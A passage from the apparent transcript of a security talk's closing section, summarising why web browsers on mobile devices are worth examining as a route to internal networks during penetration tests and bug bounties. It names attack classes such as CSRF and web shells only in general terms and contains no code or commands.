we're attacking, potentially through web shells, or CSRF that allows us to store cross-site scripting or gain remote code execution. And we could do all of this even if the victim opened the link in an incognito window, just through the virtue of the phone sitting on multiple networks.

In closing, we think it's worth reiterating some of the reasons why we think web browsers are a really interesting target that you should be looking at on your next engagement, whether as part of a bug bounty or a penetration test. Firstly, browsers operate in multiple different contexts and origins, and you should be using these as part of your assessments. Don't forget that modern web browsers are very mobile: they shift from network to network, and it's not like those browser tabs close as the computer or the mobile phone moves around. Recon work for internal systems is also really, really important, and we think it's very valuable to spend time looking at open source products as well; finding web application security vulnerabilities on internal systems can reap a lot of reward. And don't forget, new browser features are coming out all the time. They often play a bit of tug-of-war between features that can provide new functionality to users and features that toe the line of potentially privacy-impacting scenarios, so keeping across what's happening in the browser space is obviously very useful as well. And please, do test your internal apps: just because there's a firewall there doesn't mean that you're protected.